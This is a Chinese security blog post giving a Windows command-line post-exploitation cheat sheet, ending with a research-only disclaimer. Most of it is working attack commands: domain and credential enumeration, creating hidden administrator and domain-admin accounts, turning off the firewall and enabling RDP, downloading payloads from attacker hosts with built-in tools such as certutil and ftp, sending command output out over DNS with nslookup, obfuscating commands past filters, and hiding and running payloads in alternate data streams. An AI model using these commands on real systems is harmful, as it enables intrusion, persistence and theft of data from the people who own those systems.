2022年12月6日10:33:05评论105 views字数 14295阅读47分39秒阅读模式

系统信息

版本和补丁信息

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #获取架构
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #仅获取这些信息
wmic computersystem LIST full #获取电脑信息
wmic qfe get Caption,Description,HotFixID,InstalledOn #补丁程序
wmic qfe list brief #更新
hostname
DRIVERQUERY #第三方易受攻击驱动?

环境

set #列出所有环境变量

需要强调的一些环境变量:

COMPUTERNAME: 计算机名称
TEMP/TMP: 临时文件夹
USERNAME: 用户名
HOMEPATH/USERPROFILE: 主目录
windir: C:Windows
OS:Windos OS
LOGONSERVER: 域控制器名称
USERDNSDOMAIN: 与DNS一起使用的域名
USERDOMAIN: 域名的名称

nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DC的DNS请求

挂载磁盘

(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername

回收站

dir C:$Recycle.Bin /s /b

流程、服务和软件

schtasks /query /fo LIST /v #计划任务的冗余
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM|Task To Run" | grep -B 1 SYSTEM
tasklist /V #进程列表
tasklist /SVC #将进程链接到已启动的服务
net start #Windows服务启动
wmic service list brief #列出服务
sc query #服务清单
dir /a "C:Program Files" #已安装的软件
dir /a "C:Program Files (x86)" #已安装的软件
reg query HKEY_LOCAL_MACHINESOFTWARE #已安装的软件

域信息

# 常见AD信息
echo %USERDOMAIN% #获取域名
echo %USERDNSDOMAIN% #获取域名
echo %logonserver% #获取域控制器的名称
set logonserver #获取域控制器的名称
set log #获取域控制器的名称
gpresult /V # 应用当前策略
wmic ntdomain list /format:list    #显示有关域和域控制器的信息
# 用户
dsquery user #获取所有用户
net user /domain #列出域的所有用户
net user <ACCOUNT_NAME> /domain #获取关于该用户的信息
net accounts /domain #密码和锁定策略
wmic useraccount list /format:list #显示所有已登录设备的本地帐户和域帐户的信息
wmic /NAMESPACE:\rootdirectoryldap PATH ds_user GET ds_samaccountname #获取所有用户
wmic /NAMESPACE:\rootdirectoryldap PATH ds_user where "ds_samaccountname='user_name'" GET # 获取1个用户的信息
wmic sysaccount list /format:list # 转储关于被用作服务帐户的任何系统帐户的信息。
# 组信息
net group /domain #域组列表
net localgroup administrators /domain #列出属于域内管理员组的用户(这里包括组“domain Admins”)
net group "Domain Admins" /domain #列出具有域管理权限的用户
net group "domain computers" /domain #连接到域的pc列表
net group "Domain Controllers" /domain #列出域控制器的PC帐号
wmic group list /format:list # 所有本地组的信息
wmic /NAMESPACE:\rootdirectoryldap PATH ds_group GET ds_samaccountname #获取所有分组
wmic /NAMESPACE:\rootdirectoryldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #组的成员
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #组的成员
# 计算机
dsquery computer #得到所有的电脑
net view /domain #域的pc的Lis
nltest /dclist:<DOMAIN> #列出域控制器
wmic /NAMESPACE:\rootdirectoryldap PATH ds_computer GET ds_samaccountname #所有的电脑
wmic /NAMESPACE:\rootdirectoryldap PATH ds_computer GET ds_dnshostname #所有的电脑
# 信任关系
nltest /domain_trust #信任关系的映射
# 获取OU内的所有对象
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

日志和事件

#使用另一个凭据进行安全查询
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINEzachary /p:0987654321

用户和组

用户

#自己
whoami /all #所有关于我的信息，看看启用的令牌
whoami /priv #只显示特权
# 本地用户
net users #所有用户
dir /b /ad "C:Users"
net user %username% #用户(我)的信息
net accounts #有关密码要求的信息
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #创建用户
# 其他用户查找
qwinsta #还有人登录吗?
#启动新的cmd.exe和新的信用(模拟在网络中)
runas /netonly /user<DOMAIN><NAME> "cmd.exe" ::The password will be prompted
#作为管理员使用sysinternals中的logonsessions检查当前登录会话
logonsessions.exe
logonsessions64.exe

组

#本地
net localgroup #所有可用的组
net localgroup Administrators #组的信息(管理员)
net localgroup administrators [username] /add #添加用户到管理员
#域
net group /domain #域组信息
net group /domain <domain_group_name> #属于组的用户

列出会话

qwinsta
klist sessions

密码策略

net accounts

凭证

cmdkey /list #列出证书
vaultcmd /listcreds:"Windows Credentials" /all #查看Windows凭据管理器
rundll32 keymgr.dll, KRShowKeyMgr #你需要才能图形访问

与用户保持一致

# 添加域用户并将其放入域管理员组中
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# 添加本地用户并将其设置为本地管理员组
net user username password /ADD
net localgroup Administrators username /ADD
# 添加用户到目标的组
net localgroup "Remote Desktop Users" UserLoginName  /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

网络信息

接口，路由，端口，主机和DNSCache

ipconfig /all #显示本机TCP/IP配置的详细信息
route print #查看路由表命令
arp -a #显示查看高速缓存中的所有项目
netstat -ano #打开的端口信息
type C:WINDOWSSystem32driversetchosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"

防火墙

netsh firewall show state # 防火墙信息，开放端口
netsh advfirewall firewall show rule name=all
netsh firewall show config # 显示防火墙配置
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off  #关闭
NetSh Advfirewall set allprofiles state on  #打开
netsh firewall set opmode disable #关闭
#如何打开端口
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop" 
#启用远程桌面
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #我发现这一行不需要
::sc config TermService start= auto #我发现这一行不需要
::net start Termservice #我发现这一行不需要
#使用wmic开启远程桌面
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##或
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
#启用远程协助:
reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
#Ninja组合(新管理员用户，RDP + rassist +防火墙允许)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

共享

net view #获得计算机的列表
net view /all /domain [domainname] #域上的共享
net view \computer /ALL #列出计算机的共享
net use x: \computershare #在本地装载共享
net share #查看当前共享

Wifi

netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #获取明文密码

SNMP

reg query HKLMSYSTEMCurrentControlSetServicesSNMP /s

Network Interfaces

ipconfig /all

ARP table

arp -A

下载

Bitsadmin.exe

bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:dataplayfolderautoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1

CertReq.exe

CertReq -Post -config https://example.org/ c:windowswin.ini output.txt

Certutil.exe

certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

Desktopimgdownldr.exe

set "SYSTEMROOT=C:WindowsTemp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Diantz.exe

diantz.exe \remotemachinepathToFilefile.exe c:destinationFolderfile.cab

Esentutl.exe

esentutl.exe /y \live.sysinternals.comtoolsadrestore.exe /d \otherwebdavserverwebdavadrestore.exe /o

Expand.exe

expand \webdavfolderfile.bat c:ADSfile.bat

Extrac32.exe

extrac32 /Y /C \webdavserversharetest.txt C:foldertest.txt

Findstr.exe

findstr /V /L W3AllLov3DonaldTrump \webdavserverfolderfile.exe > c:ADSfile.exe

Ftp.exe

cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

GfxDownloadWrapper.exe

C:WindowsSystem32DriverStoreFileRepositoryigdlh64.inf_amd64_[0-9]+GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

Hh.exe

HH.exe http://some.url/script.ps1

Ieexec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab.exe

makecab \webdavserverwebdavfile.exe C:Folderfile.cab

MpCmdRun.exe

MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable

Replace.exe

replace.exe \webdav.host.comfoobar.exe c:outdir /A

Excel.exe

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Powerpnt.exe

Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Squirrel.exe

squirrel.exe --download [url to package]

Update.exe

Update.exe --download [url to package]

Winword.exe

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Wsl.exe

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Misc

cd #列出当前目录
cd C:pathtodir #改变目录
dir #列出当前目录内容
dir /a:h C:pathtodir #列出隐藏文件
dir /s /b #没有垃圾的递归列表
time #获取当前时间
date #获取当前日期
shutdown /r /t 0 #重启
type <file> #从第一个字节开始正向打印文件内容
#Runas
runas /savecred /user:WORKGROUPAdministrator "\10.XXX.XXX.XXXSHAREevil.exe" #使用保存的凭据
runas /netonly /user:<DOMAIN><NAME> "cmd.exe" ::The password will be prompted
#Hide
attrib +h file #设置隐藏
attrib -h file #退出隐藏
#对你拥有的文件给予完全的控制权
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #删除权限
#递归复制到smb
xcopy /hievry C:Userssecurity.yawcam \10.10.14.13namewin
#Exe2bat转换bat文件中的exe文件
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
# 从代码中获取错误消息
net helpmsg 32 #32是这种情况下的代码

Bypass Char Blacklisting

echo %HOMEPATH:~6,-11%   #
who^ami   #whoami

DOSfuscation

生成混淆的CMD命令行

git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:UsersAdministratorDesktopflag.txt
encoding

Listen address ACLs

您可以在[http://+:80/Temporary_listen_Addresses/]上侦听，而无需管理员身份。

netsh http show urlacl

Manual DNS shell

Attacker (Kali) 必须使用以下两个选项之一：

sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive

Victim

对于/f标记_**technique：这允许我们执行命令，获取每行的前X个单词，并通过DNS将其发送到服务器

for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one

您还可以重定向输出，然后读取输出。

whoami /priv | finstr "Enab" > C:UsersPublicDocumentsout.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:UsersPublicDocumentsout.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>

从C代码调用CMD

#include <stdlib.h>     /* system, NULL, EXIT_FAILURE */
// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
    int i;
    i=system("net users otherAcc 0TherAcc! /add");
    i=system("net localgroup administrators otherAcc /add");
    return 0;
}

备用数据流CheatSheet（ADS/备用数据流）

Taken from https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

##Add content to ADS###
type C:tempevil.exe > "C:Program Files (x86)TeamViewerTeamViewer12_Logfile.log:evil.exe"
extrac32 C:ADSprocexp.cab c:ADSfile.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:ADSprocexp.exe > c:ADSfile.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:temp:ttt
makecab c:ADSautoruns.exe c:ADScabtest.txt:autoruns.cab
print /D:c:adsfile.txt:autoruns.exe c:adsAutoruns.exe
reg export HKLMSOFTWAREMicrosoftEvilreg c:adsfile.txt:evilreg.reg
regedit /E c:adsfile.txt:regfile.reg HKEY_CURRENT_USERMyCustomRegKey
expand \webdavfolderfile.bat c:ADSfile.txt:file.bat
esentutl.exe /y C:ADSautoruns.exe /d c:ADSfile.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:ADSfile.exe -Raw | Set-Content C:ADSfile.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:temptextfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
set-content - path {path to the file} - stream {name of the stream}
## Discover ADS contecnt
dir /R 
streams.exe <c:pathtofile> #Binary from sysinternals#
Get-Item -Path .fie.txt -Stream *
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
##Extract content from ADS###
expand c:adsfile.txt:test.exe c:tempevil.exe
esentutl.exe /Y C:tempfile.txt:test.exe /d c:tempevil.exe /o
more < c:adsfile.txt:test.exe
##Executing the ADS content###
* WMIC
wmic process call create '"C:Program Files (x86)TeamViewerTeamViewer12_Logfile.log:evil.exe"'
* Rundll32
rundll32 "C:Program Files (x86)TeamViewerTeamViewer13_Logfile.log:ADSDLL.dll",DllMain
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
* Cscript
cscript "C:Program Files (x86)TeamViewerTeamViewer13_Logfile.log:Script.vbs"
* Wscript
wscript c:adsfile.txt:script.vbs
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%test.txt:hi.js && wscript.exe %temp%test.txt:hi.js
* Forfiles
forfiles /p c:windowssystem32 /m notepad.exe /c "c:tempshellloader.dll:bginfo.exe"
* Mavinject.exe
c:windowsSysWOW64notepad.exe
tasklist | findstr notepad
notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
type c:tempAtomicTest.dll > "c:Program Files (x86)TeamViewerTeamViewer13_Logfile.log:Atomic.dll"
c:windowsWinSxSwow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48mavinject.exe 4172 /INJECTRUNNING "c:Program Files (x86)TeamViewerTeamViewer13_Logfile.log:Atomic.dll"
* MSHTA
mshta "C:Program Files (x86)TeamViewerTeamViewer13_Logfile.log:helloworld.hta"
(Does not work on Windows 10 1903 and newer)
* Control.exe
control.exe c:windowstaskszzz:notepad_reflective_x64.dll
https://twitter.com/bohops/status/954466315913310209
* Create service and run
sc create evilservice binPath= ""c:ADSfile.txt:cmd.exe" /c echo works > "c:ADSworks.txt"" DisplayName= "evilservice" start= auto
sc start evilservice
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* Powershell.exe
powershell -ep bypass - < c:temp:ttt
* Powershell.exe
powershell -command " & {(Get-Content C:ADS1.txt -Stream file.exe -Raw | Set-Content c:ADSfile.exe) | start-process c:ADSfile.exe}"
* Powershell.exe
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:adsfolder:file.exe}
* Regedit.exe
regedit c:adsfile.txt:regfile.reg
* Bitsadmin.exe
bitsadmin /create myfile
bitsadmin /addfile myfile c:windowssystem32notepad.exe c:dataplayfoldernotepad.exe
bitsadmin /SetNotifyCmdLine myfile c:ADS1.txt:cmd.exe NULL
bitsadmin /RESUME myfile
* AppVLP.exe
AppVLP.exe c:windowstracingtest.txt:ha.exe
* Cmd.exe
cmd.exe - < fakefile.doc:reg32.bat
https://twitter.com/yeyint_mth/status/1143824979139579904
* Ftp.exe
ftp -s:fakefile.txt:aaaa.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* ieframe.dll , shdocvw.dll (ads)
echo [internetshortcut] > fake.txt:test.txt && echo url=C:windowssystem32calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:tempadsfake.txt:test.txt
rundll32.exe shdocvw.dll,OpenURL C:tempadsfake.txt:test.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* bash.exe
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
bash.exe -c $(fakefile.txt:payload.sh)
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* Regsvr32
type c:WindowsSystem32scrobj.dll > Textfile.txt:LoveADS
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫